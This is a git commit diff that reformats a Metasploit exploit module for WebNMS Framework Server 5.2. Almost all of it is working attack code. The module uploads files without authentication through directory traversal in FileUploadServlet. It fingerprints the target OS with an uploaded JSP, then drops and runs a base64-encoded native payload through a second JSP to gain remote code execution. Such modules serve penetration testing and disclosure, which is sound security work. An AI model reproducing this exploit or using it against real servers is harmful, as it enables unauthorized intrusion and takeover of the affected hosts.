Merge pull request #29 from bwatters-r7/update-7062

Pedro Ribeiro · web-flow · commit ded4d3146cf7 · 2016-07-15T13:09:12.000+01:00
Update 7062
diff --git a/modules/exploits/multi/http/webnms_file_upload.rb b/modules/exploits/multi/http/webnms_file_upload.rb
@@ -13,81 +13,87 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'WebNMS Framework Server Arbitrary File Upload',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name'         => 'WebNMS Framework Server Arbitrary File Upload',
+        'Description'  => %q(
 This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
 unauthenticated user to upload text files by using a directory traversal attack
 on the FileUploadServlet servlet. A JSP file can be uploaded that then drops and
 executes a malicious payload, achieving code execution under the user which the
 WebNMS server is running.
 This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
 Windows and Linux.
-},
-      'Author'       =>
-        [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ]
-        ],
-      'DefaultOptions' => { 'WfsDelay' => 15 },
-      'Privileged'  => false,
-      'Platform'    => %w{ linux win },
-      'Targets'     =>
-        [
-          [ 'Automatic', { } ],
-          [ 'WebNMS Framework Server 5.2 / 5.2 SP1 - Linux',
-            {
-              'Platform' => 'linux',
-              'Arch' => ARCH_X86
-            }
+),
+        'Author'       =>
+          [
+            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
           ],
-          [ 'WebNMS Framework Server 5.2 / 5.2 SP1 - Windows',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_X86
-            }
-          ]
-        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jul 4 2016'))
+        'License'      => MSF_LICENSE,
+        'References'   =>
+          [
+            [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ]
+          ],
+        'DefaultOptions' => { 'WfsDelay' => 15 },
+        'Privileged'   => false,
+        'Platform'     => %w(linux win),
+        'Targets'      =>
+          [
+            [ 'Automatic', {} ],
+            [
+              'WebNMS Framework Server 5.2 / 5.2 SP1 - Linux',
+              {
+                'Platform' => 'linux',
+                'Arch'     => ARCH_X86
+              }
+            ],
+            [
+              'WebNMS Framework Server 5.2 / 5.2 SP1 - Windows',
+              {
+                'Platform' => 'win',
+                'Arch'     => ARCH_X86
+              }
+            ]
+          ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Jul 4 2016'
+      )
+    )
 
     register_options(
       [
         OptPort.new('RPORT', [true, 'The target port', 9090]),
-        OptString.new('TARGETURI', [ true,  "WebNMS path", '/'])
-      ], self.class)
+        OptString.new('TARGETURI', [ true, "WebNMS path", '/'])
+      ],
+      self.class
+    )
   end
 
-
   def check
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => normalize_uri(datastore['TARGETURI'], 'servlets', 'FileUploadServlet'),
       'method' => 'GET'
-    })
+    )
     if res && res.code == 405
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Unknown
     end
   end
 
-
   def upload_payload(payload, is_exploit)
     jsp_name = 'WebStart-' + rand_text_alpha(rand(8) + 3) + '.jsp'
     if is_exploit
       print_status("#{peer} - Uploading payload...")
     end
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => normalize_uri(datastore['TARGETURI'], 'servlets', 'FileUploadServlet'),
       'method' => 'POST',
       'data'   => payload.to_s,
       'ctype'  => 'text/html',
       'vars_get' => { 'fileName' => '../jsp/' + jsp_name }
-    })
+    )
 
     if res && res.code == 200 && res.body.to_s =~ /Successfully written polleddata file/
       if is_exploit
@@ -99,39 +105,37 @@ def upload_payload(payload, is_exploit)
     end
   end
 
-
   def pick_target
     return target if target.name != 'Automatic'
 
     print_status("#{peer} - Determining target")
-    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    os_finder_payload = %{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
     jsp_name = upload_payload(os_finder_payload, false)
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => normalize_uri(datastore['TARGETURI'], 'jsp', jsp_name),
       'method' => 'GET'
-    })
+    )
 
     if res && res.code == 200
       register_files_for_cleanup('jsp/' + jsp_name)
-      if res.body.to_s =~ /Linux/
+      if res.body.include? "Linux"
         return targets[1]
-      elsif res.body.to_s =~ /Windows/
+      elsif res.body.include? "Windows"
         return targets[2]
       end
     end
 
     return nil
   end
 
-
   def generate_jsp_payload
-    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
+    opts = { arch: @my_target.arch, platform: @my_target.platform }
     payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     exe = generate_payload_exe(opts)
     base64_exe = Rex::Text.encode_base64(exe)
 
-    native_payload_name = rand_text_alpha(rand(6)+3)
+    native_payload_name = rand_text_alpha(rand(6) + 3)
     ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
     var_raw     = rand_text_alpha(rand(8) + 3)
@@ -144,13 +148,13 @@ def generate_jsp_payload
 
     if @my_target['Platform'] == 'linux'
       var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      chmod = %Q|
+      chmod = %|
       Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
       Thread.sleep(200);
       |
 
       var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      cleanup = %Q|
+      cleanup = %|
       Thread.sleep(200);
       Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
       |
@@ -159,7 +163,7 @@ def generate_jsp_payload
       cleanup = ''
     end
 
-    jsp = %Q|
+    jsp = %|
     <%@page import="java.io.*"%>
     <%@page import="sun.misc.BASE64Decoder"%>
     <%
@@ -182,16 +186,10 @@ def generate_jsp_payload
     }
     %>
     |
-
-    jsp = jsp.gsub(/\n/, '')
-    jsp = jsp.gsub(/\t/, '')
-    jsp = jsp.gsub(/\x0d\x0a/, "")
-    jsp = jsp.gsub(/\x0a/, "")
-
+    jsp.delete!("\n\r\t")
     return jsp
   end
 
-
   def exploit
     @my_target = pick_target
     if @my_target.nil?
@@ -209,16 +207,16 @@ def exploit
 
     jsp_payload = generate_jsp_payload
     jsp_name = upload_payload(jsp_payload, true)
-    if jsp_name == nil
+    if jsp_name.nil?
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     else
       register_files_for_cleanup('jsp/' + jsp_name)
     end
 
     print_status("#{peer} - Executing payload...")
-    send_request_cgi({
+    send_request_cgi(
       'uri'    => normalize_uri(datastore['TARGETURI'], 'jsp', jsp_name),
       'method' => 'GET'
-    })
+    )
   end
 end
